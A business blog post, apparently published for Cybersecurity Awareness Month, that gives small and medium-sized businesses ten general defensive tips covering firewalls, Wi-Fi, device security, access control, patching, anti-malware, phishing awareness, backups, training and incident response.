Small and medium-sized businesses (SMBs) - and their websites and social media accounts - are the #1 target for cybercriminals. Shockingly, 43% of all data breaches target SMBs; 61% of these businesses in the U.S. and U.K. were hit by cyberattacks last year. These attacks are not random—SMBs often have weak security due to limited resources and budget, making them easy prey for opportunistic criminals.
Despite this high threat level, 43% of SMBs have no cybersecurity plan in place. The risks are serious: downtime, lost revenue, damaged reputation, and more—with 58% of SMBs experiencing sales impacting business interruptions due to cyberattacks. With the rise of Artificial Intelligence (AI)-driven threats and easy-to-use hacking tools available for sale on the dark web, the need for solid cybersecurity has never been more urgent.
But where do you start? Our Top 10 Cybersecurity Tips are listed below.
Check your business's security against our risk reduction tips and take action where needed. Strengthen your cyber defenses and reduce your risk of becoming the next victim of cybercrime.
Here are your Top 10 Cybersecurity Tips:
- Secure all connections to the internet with a firewall.
- Secure your wireless networks.
- Secure the devices and software you use.
- Control access to your data and services.
- Keep your devices and software up to date (“Patching”).
- Protect against viruses and other malware.
- Address the threat from social engineering and scams.
- Secure and backup your data.
- Improve security awareness.
- Be prepared to respond to security incidents.
1. Secure all connections to the internet with a firewall:
A firewall sits between your computer systems and the internet. Firewalls are a barrier to keep unwanted traffic from the internet and potential external attackers out of your network and systems. Firewalls can be configured to allow the access you and your business need and block anything you don’t want or authorize.
Extra tip: Make sure firewalls are in place to protect your business’s computer systems and networks, wherever they are – including any home networks if you or your employees are undertaking business activities from home.
Your firewall may be one or both of the following:
- A dedicated boundary firewall places a protective buffer around the network. Some routers (such as the device provided by your internet service provider (ISP)) will contain a firewall to provide this boundary protection role. But this can’t be guaranteed – if you can, ask your ISP about your specific model.
- Personal Firewall or Endpoint Protection software will run on each internet-connected device and protect only the system it is running on. Most operating systems have one built-in, but please ensure it is enabled.
Having both types of firewalls is recommended to provide 2 separate layers of protection for your systems.
Level up your firewall protection:
- Make sure the firewall software is up to date.
- Check that the firewall is not still set up with the default (‘out of the box’) admin username and password.
- Check that the firewall’s administrative interface is inaccessible from the Internet.
If a business needs to allow firewall administration remotely, ensure the access is restricted to the personnel that need it. - Control the inbound and outbound traffic allowed to communicate into and out of your network.
- Turn on any additional security features your firewall may have, such as intrusion detection, blocking, and web content filtering.
2. Secure your wireless networks:
Your business network—or the home network you or your employees use to perform business-related activities—may be a wired network, where the computer systems are physically connected to the network (using Ethernet or Cat-5 cable), or it could be a wireless network (a ‘Wi-Fi’ network).
If the network is wireless, to help you to secure the Wi-Fi network, check that:
- The wireless router and/or access point’s software is current.
- The wireless router and/or access point is not set up with the default (‘out of the box’) admin username and password.
- The wireless network uses at least WPA2 encryption (with its strongest available encryption option, e.g., WPA2-AES) to protect the traffic between your computer or mobile devices and the wireless access points.
- The wireless network is password protected. Anyone wanting to join the network must know its access code or password.
- The Wi-Fi password is very long and complex. This can hinder a hacker’s ability to crack it through guessing techniques or automated software tools, which often have character length and complexity limitations.
- The wireless network’s access code or password is only given to people you know and trust.
3. Secure the devices and software you use:
The computers and devices you or your employees use to do your job may be company systems or your devices. More and more employees use personal devices to conduct business, such as checking inventory and shipment status. This could quickly expand to working with your business applications and systems, making or taking orders and payments, or accessing, editing, or storing company-sensitive, customer, or personal data. It is important to ensure that those devices and the software or apps installed are secure.
To check that your devices and software are configured securely:
- Remove any unnecessary software and applications.
- Disable any functions or services that aren’t needed.
- Turn on additional security features that enhance security.
- Check software and app settings and disable features and functions that aren’t needed.
- Avoid using jailbroken or rooted mobile devices for business purposes.
It’s also essential to make sure your devices encrypt the data they hold:
- On an iPhone or iPad, everything is encrypted as soon as a passcode, a Touch ID fingerprint, or a Face ID face is set.
- Microsoft provides built-in encryption features for Windows computers: Windows 10 and 11 Home Editions support Device Encryption to protect local files and folders; Bitlocker entire disk encryption is available for both editions of Windows.
- Most recent high-end Android devices now have encryption enabled by default, so check all your devices you may use for work.
- The data on Mac computers can be encrypted using the built-in FileVault disk encryption feature.
Finally, make sure only authorized people can get access to and use your computers and devices:
- Remove or change any default usernames and passwords.
- Make sure a login is needed to gain access to devices.
- Make sure solid passwords or PINs are being used.
- Lastly, use Multi-Factor Authentication (MFA) to provide additional protection against unauthorized access by requiring multiple forms or verification beyond just a password.
4. Control access to your data and services:
You and your employees need access to your computer systems and devices, networks, systems, resources, applications, and information to operate your business and support your customers. However, the impact of a data breach, an account compromise, or account misuse (even if it is accidental) will be more significant if you and your users access those networks, systems, and information with a greater level of access rights and privileges than is needed to do your job.
Check that user accounts don’t have any unnecessary access rights or system privileges:
- Do user accounts only give access to the systems and data the user needs to be able to do their job?
- Is the user's level of privilege on the systems or to the data appropriate to their job?
- For example, warehouse staff who pick and pack your online orders may need to access your order management system to view the delivery details. Still, they don’t need the privileges to view the pricing or payment details or to edit customer details. - User accounts should have enough access to system settings, software, applications, online services, etc., to perform their roles.
- Users’ access rights and privileges to your business systems and data should be limited to what they need to do their current jobs.
- Users’ accounts for day-to-day use should not have administrative privileges on the local computer.
- If you use your home computer for business purposes, check the rights and privileges of the user account you usually log in with.
- Enable logging or audit trails for your systems and applications if not already enabled.
- Monitor user activity, especially the accounts of users working from home or those with additional privileges.
- Follow-up on any anomalies.
5. Keep your devices and software up to date (“Patching”):
Cybercriminals, as well as legitimate security researchers (‘Whitehat hackers’), are continually searching for weaknesses (vulnerabilities) within firewalls and network devices (such as your wireless access points), operating systems, applications, software, security protocols, and coding.
Cybercriminals are looking for vulnerabilities that provide new ways to break into your systems and gain unauthorized data. Whitehat hackers are working for the greater good, identifying new weaknesses and notifying the vendors/developers so that fixes (security patches) can be developed and made available to the user community.
The role of business and personal users of the affected systems is to install those security updates before the cybercriminals devise a way to exploit the weaknesses. The cybercriminals’ attacks can make systems unusable, disrupt business and personal activities, or expose sensitive company information, personal data, or payment card details to fraudulent and illegal use. Patching the technologies you and your business rely upon is the most important thing you can do to protect your business from attacks and data breaches – close those known weaknesses before they are found and exploited by attackers.
- Take steps to ensure that all the technology and software you and your business use are current.
- Recognize that patching your systems may not be as simple as it sounds.
- Use software from trusted sources licensed and supported by the vendor.
- If available, enable automatic updating of your devices’ operating systems and applications
- Where an automatic update is not possible, ensure security updates are installed as soon as possible after they become available.
6. Protect against viruses and other malware:
Malicious software (also known as ‘malware’) is software or web content that can cause harm to your business, to your customers, or others. Malware is an umbrella term that refers to software intentionally designed to cause damage and includes viruses, Trojans, worms, ransomware, spyware, adware, and rootkits. Malware may be unknowingly downloaded and/or installed online through web browsing or email. It may also be installed when connecting removable devices such as CDs and DVDs, USB memory sticks and hard drives, and mobile devices to your systems.
Malware can give cybercriminals access to your systems, lock you out of your files and data, and hold your computer and information for ransom. Some malware can remain hidden on your computer while giving cybercriminals remote control or the ability to track the keys tapped on your keyboard. Other malware infections make your computer part of a botnet controlled by cybercriminals that can be used, without your knowledge, for malicious purposes such as assisting in distributed denial-of-service (DDoS) attacks against other businesses or sending out millions of spam emails.
Protect all your servers, computers, and devices from malware threats by installing anti-virus or anti-malware software:
- Windows has built-in virus and threat protection and can be complemented with other protections such as managed detection and response.
- Apple’s design and control of iPhones and iPads means they aren’t vulnerable to most malware techniques cybercriminals use. However, jailbroken devices can install apps not authorized by Apple that could be infected by malware. In addition, adware and spyware can still threaten iPads and iPhones, and a phishing attack can still scam you.
- Check if your anti-virus or anti-malware software provides heuristic and signature-based scanning. A heuristic scanner uses what is known about existing malware and what it has learned from experience to identify new threats even before the anti-virus software vendor creates a definition update to detect it.
- Make sure your anti-virus or anti-malware software comes from reputable sources and, if possible, use the ‘paid for’ rather than a free version.
- Make sure anti-virus / anti-malware software is always running on your systems, is kept up to date automatically, and has real-time / on-access protection enabled.
- Make sure to schedule regular full scans of each of your devices, e.g., weekly, to detect malicious software that may have gotten past your protection measures
- Avoid using the computers and mobile devices you run your business from for non-business purposes.
- Make sure users cannot disable or alter the anti-virus / anti-malware software on your systems.
- If endpoint protection software is not installed on your devices, consider installing it for extra protection.
7. Address the threat from social engineering and scams:
Social engineering is manipulating a person to divulge confidential information or to carry out actions. Types of social engineering include:
Phishing: scammers send emails purporting to be from a legitimate sender, often from a well-known brand or authority you trust. The scammer aims to trick the recipient into clicking a link that installs malware or asks them to share confidential details (like login credentials or financial information).
Shared Document Phishing: the scammers send emails that appear to come from file-sharing sites like Dropbox or Google Drive, alerting the recipient that a document has been shared with them. The link in these emails is to a fake login page that mimics the real file-sharing site’s login page to steal users' account credentials as they log in.
Spear Phishing: This is a more tailored approach where the perpetrator targets a specific individual or business. For example, information about the person or business on LinkedIn or the company website can trick the recipient into thinking they are connected with the sender, making them more likely to click a link or attachment in the email.
Whaling: Whaling emails impersonate a real company executive to persuade the recipient to transfer money or send sensitive information to the attacker. These attacks use a fake domain that is a ‘look-alike’ or very close to the domain the scammers are attempting to impersonate. Often, these emails are expressed as an emergency, stating that the requested action is urgently needed and highlighting the consequences of delaying, all to discourage the recipient from pausing to verify the request or seek authorization.
Business email compromise (BEC) attacks: also known as cyber-enabled financial fraud. BEC attacks involve fraud and deception, usually targeting employees with access to company finance processes, who are duped into transferring funds to bank accounts that they think are legitimate, but which instead are accounts controlled by the criminal.
Scareware: this is where the victim is led to believe that their computer or device is infected with malware or has downloaded illegal content. The scammers display frightening screens of the victim’s computer, such as a fake virus alert. The victim is then offered a solution, which is often the installation of actual malware.
What steps can you take to protect your business and employees from social engineering?
- Define your Acceptable Usage Policies and ensure your employees understand them. These policies help protect your business.
- Educate your employees – at all levels of the company – as to how they could fall victim to a social engineering attack.
Make sure you and your employees know what to look out for in social engineering emails. - Report all attacks:
- Encourage your employees to tell you (or your IT Security team) if they think they have fallen victim to social engineering.
- Do not punish them if they get caught out. It discourages your employees from reporting in the future. - Use the technical capabilities of your email system to enhance staff awareness and help them spot potential attacks.
- Implement multi-factor authentication for business webmail.
8. Secure and backup your data:
Imagine how you would operate without access to the data your business relies on, such as customer details, contacts, emails, quotes and orders, product information, etc. Regardless of size, all businesses should take regular backups of their critical data and ensure that these backups are recent and can be restored. By doing this, you’re ensuring your business can still function following the impact of flood, fire, physical damage, or theft. Furthermore, if you have backups of your data that you can quickly recover, you can’t be blackmailed by ransomware attacks.
Backup your electronic data:
- Understand what data needs to be backed up.
- What information does your business create, receive, retain, etc., essential to your operations? Do you know where that data is? It could be files and folders on your and your employees’ computers or mobile devices, your network, or your applications and systems. - Take regular backups of all that important data, making sure they are recent and can be restored.
- Keep the backup separate from the computer or system holding the original copy.
- Make sure access to data backups is restricted.
- Regularly check the backups and your ability to restore data from those backups.
Control removable media (including CDs, DVDs, USB sticks, portable hard drives, etc):
- Encrypt removable media.
- Track all removable media used for data storage and backups so you don’t lose them and can recover their contents when needed.
- Ensure you protect your systems and networks from malware that could be introduced via removable media.
9. Improve security awareness:
You must ensure that everyone in your business understands their role in protecting your business (and themselves) from cyberattacks and data breaches.
- Ask your employees to review the security practices in this blog to know how to protect their network, devices, business data, and themselves from security breaches, malicious software, and scammers.
- Make sure everyone knows what is expected for secure and acceptable use of your systems. Remind your employees of your policies on using the Internet, email, social media, removable media, etc.
- Practicing good security is not about your employees being security experts; encourage them to focus on:
- Using their common sense.
- Maintaining a healthy skepticism: especially regarding requests for sensitive information or urgent calls to action.
- Always report their suspicions: the sooner a potential breach is reported, the sooner action can be taken to minimize the impact and warnings issued to raise awareness in others. - Maintain awareness of cyber risks:
- Monitor alerts and security bulletins from reliable sources.
- Review warnings of new scams, new cyber threats, and attack methods.
- Consider the risk to your business and take any necessary steps to improve security measures and protect your business.
10. Be prepared to respond to security incidents:
It is much harder to deal with a data breach or security incident if you haven’t planned ahead of time. Indeed, if you haven’t prepared an Incident Response Plan for your business, not only will that slow down your response and potentially increase the impact of any incident, but it might also mean that you remain unaware when your business is breached.
Suppose you aren’t monitoring your systems for security events or asking your employees to report their security concerns (such as when they realize they have fallen victim to a phishing attack). In that case, you won’t be able to respond to contain and recover from the security incident. Nor will you be able to take steps to improve and update your security measures if you don’t know that their effectiveness has already been found wanting.
At a high level, your business needs to:
- Prepare for a security incident or breach.
- Make sure you and your employees know what types of breaches or incidents might occur so that:
- You can spot if there’s been an incident/breach (or if an attack is underway.
- Your staff knows to report any problems or suspicions.
- You know how to contain, resolve, and recover from any incidents or breaches.
Take Action to Keep Your Business Uninterrupted
Cybersecurity Awareness Month is here to remind every business that there are simple, effective ways to stay safe online and to protect their data from cybercrime. Use our Top 10 Cybersecurity Tips to assess, update, and improve your cyber defense plan.
Stay vigilant, stay secure, and make cybersecurity a fundamental part of daily focus to keep your business uninterrupted.
For more information about this topic, take a look at our Cybersecurity Awareness Month infographic